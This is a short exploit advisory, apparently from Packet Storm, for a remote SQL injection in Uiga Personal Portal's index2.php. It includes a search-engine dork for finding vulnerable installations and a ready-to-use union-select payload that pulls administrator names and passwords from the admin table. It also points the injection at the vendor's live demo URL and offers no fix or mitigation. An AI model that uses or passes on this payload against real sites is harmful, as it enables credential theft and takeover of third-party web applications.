Uiga Personal Portal suffers from a remote SQL injection vulnerability in index2.php.
b9152582b0c4f0b77c7e1db220fcefc393f21d4e2076d4a38a60087190e6ac5d########################################################################################
# #
# Exploit Title : Uiga Personal Portal Sql Injection Vulnerability #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Version : All Version #
# #
# Vendor : www.uiga.com #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# Dork : "Copyright uigapersonalportal.com" #
# #
########################################################################################
# #
# Expl0iT: #
# #
# #
# http://[TarGeT]/[Patch]/index2.php?c=1&p=[SQL] #
# #
# +SQL : #
# #
# -1+union+select+1,group_concat(admin_name,0x3a,admin_password),3,4,5+from+admin #
# #
# #
# Demo : #
# #
# http://www.uiga.com/product/demo/uigaportal/index2.php?c=29&p=[SQL*] #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed